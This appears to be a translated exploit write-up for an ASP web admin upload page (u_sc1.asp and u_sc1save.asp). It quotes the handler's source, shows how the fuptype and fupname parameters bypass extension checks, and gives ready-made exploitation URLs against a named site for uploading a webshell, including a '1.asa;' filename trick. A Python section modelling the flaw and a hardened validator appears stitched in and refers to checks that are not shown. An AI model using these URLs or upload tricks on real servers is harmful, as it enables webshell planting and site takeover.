Author: village chief
File u_sc1.asp source code:
<!--#include file="../include/yiwebchina.asp"-->
<%
session("fuptype") = request("fuptype")
'Here fuptype is accepted from the request and saved to session("fuptype"); the next file reads it from the session.
session("fupname") = request("fupname")
'Here fupname is accepted from the request and saved to session("fupname"); the next file reads it from the session.
session("frmname") = request("frmname")
'... remaining code omitted ...
%>
<form name="form1" method="post" action="u_sc1save.asp" enctype="multipart/form-data">
<B>select the file to be uploaded:</B><br>
<input type=file name="file1"> <input type=submit name="submit" value="Upload"><br>
· after clicking "Upload", please be patient (do not click "Upload" again). The upload time depends on the file size and network conditions.<br>
· to save space, optimize image files as much as possible; we recommend that a single file not exceed 50 KB.<br>
· when transferring large files, the server may be slow or unstable. We recommend that you use FTP to upload large files.
</form>
File u_sc1save.asp source code:
<!--#include file="../include/yiwebchina.asp"-->
<%
'(code omitted: the upload object "file" is created, and fuptype and the base of "filename" are taken from the session values set by u_sc1.asp)
'Point 2 applies here: the fupname value from the URL becomes the saved file name, so it can be set to 1.asa; (see exploitation 1 below).
filenameend = file.filename
filenameend = split(filenameend, ".")
n = UBound(filenameend)
filename = filename & filenameend(n)   'client-chosen name plus the upload's last extension
if fuptype <> "db" then
  if file.fileSize > 200000 then
    response.write "<script language='javascript'>"
    response.write "alert('the file you uploaded is too large and cannot be uploaded successfully. The maximum size of a single file cannot exceed 200 KB!');"
    response.write "location.href='javascript:history.go(-1)';"
    response.write "</script>"
    response.end
  end if
end if
if fuptype = "adv" or fuptype = "pic" then
  'The problem also occurs here: the suffix is only checked when fuptype = adv or fuptype = pic.
  if LCase(filenameend(n)) <> "gif" and LCase(filenameend(n)) <> "jpg" and LCase(filenameend(n)) <> "swf" and LCase(filenameend(n)) <> "htm" then
    response.write "<script language='javascript'>"
    response.write "alert('the selected file format cannot be uploaded. Please check and upload again!');"
    response.write "location.href='javascript:history.go(-1)';"
    response.write "</script>"
    response.end
  end if
end if
'Point 1 applies here: the fuptype value selects the save path. adv and pic cannot be used (they are suffix-checked above),
'and if fuptype is left blank no path is returned after the upload, so only pic1, link and db are usable; pick one of them.
if fuptype = "adv" then
  savepath = "../images/adv/" & filename
elseif fuptype = "pic" then
  savepath = "../pic/digi/" & filename
elseif fuptype = "pic1" then
  savepath = "../pic/digi1/" & filename
elseif fuptype = "link" then
  savepath = "../images/links/" & filename
elseif fuptype = "db" then
  savepath = "./" & filename
end if
file.saveAs Server.mappath(savepath)
response.write "File uploaded successfully! The physical path of the uploaded file is: "
response.write "<font color=red>" & Server.mappath(savepath) & "</font><br>"
response.write "<a href='" & savepath & "' target='_blank'>click to preview the uploaded file</a>"
response.write "<br><INPUT onclick='javascript:window.close();' type=submit value='upload completed'>"
%>
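To make the two weaknesses concrete, here is an added Python model of the handler's naming and suffix logic beside a hardened version; it is not the project's code, and the names ALLOWED_EXT, UPLOAD_TYPES, vulnerable_save_name, safe_save_name and is_rejected are this example's own assumptions.

```python
import re
import secrets

# The allowlist the original applies, but only when fuptype is "adv" or "pic".
ALLOWED_EXT = {"gif", "jpg", "swf", "htm"}
UPLOAD_TYPES = ("adv", "pic", "pic1", "link", "db")

def vulnerable_save_name(fuptype, fupname, uploaded_filename):
    """Model of u_sc1save.asp: the suffix is checked only for adv/pic, and the
    stored name is the client's fupname joined to the upload's last extension,
    so fupname="1.asa;" with an image upload yields "1.asa;.jpg"."""
    ext = uploaded_filename.split(".")[-1]
    if fuptype in ("adv", "pic") and ext.lower() not in ALLOWED_EXT:
        return None  # the original writes an alert and calls response.end
    return f"{fupname}.{ext}"

# Hardened counterpart (this example's own design, not the project's code).
# Exactly one extension, only safe characters, so ';', '/', '\\' and a second
# '.' are refused before anything reaches the filesystem.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

def safe_save_name(fuptype, uploaded_filename, allowed_ext=ALLOWED_EXT):
    """Apply the allowlist to every fuptype, not just adv/pic, and let the
    server choose the base name so no client-supplied string forms the path."""
    if fuptype not in UPLOAD_TYPES:
        raise ValueError("unknown fuptype")
    m = SAFE_NAME.fullmatch(uploaded_filename)
    if m is None:
        raise ValueError("filename must be name.ext with no special characters")
    ext = m.group(1).lower()
    if ext not in allowed_ext:
        raise ValueError(f"extension .{ext} not allowed for {fuptype}")
    return f"{secrets.token_hex(8)}.{ext}"

def is_rejected(fuptype, uploaded_filename):
    """True when the hardened validator refuses the upload."""
    try:
        safe_save_name(fuptype, uploaded_filename)
    except ValueError:
        return True
    return False
```

The constructed inputs in the checks mirror the page's cases: a "1.asa;" name with a .jpg upload, and a script upload under a fuptype that skips the suffix test.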
The three include files this page depends on, yiwebchina.asp, buyok.asp and functions.asp, all perform ADMIN login verification.
Vulnerability exploitation 1:
http://www.bkjia.com/admin/u_sc1.asp?fuptype=pic&fupname=1.asa;&frmname=youpic
(upload the shell with an image file extension)
Vulnerability exploitation 2:
http://www.bkjia.com/admin/u_sc1.asp?fuptype=pic1&fupname=banner3&frmname=youpic (upload as needed)
http://www.bkjia.com/admin/u_sc1.asp?fuptype=link&fupname=banner3&frmname=youpic (upload as needed)
http://www.bkjia.com/admin/u_sc1.asp?fuptype=db&fupname=banner3&frmname=youpic (upload as needed)
Note that the shell file size must not exceed 200 KB (the fourth, db, upload is exempt from the size check).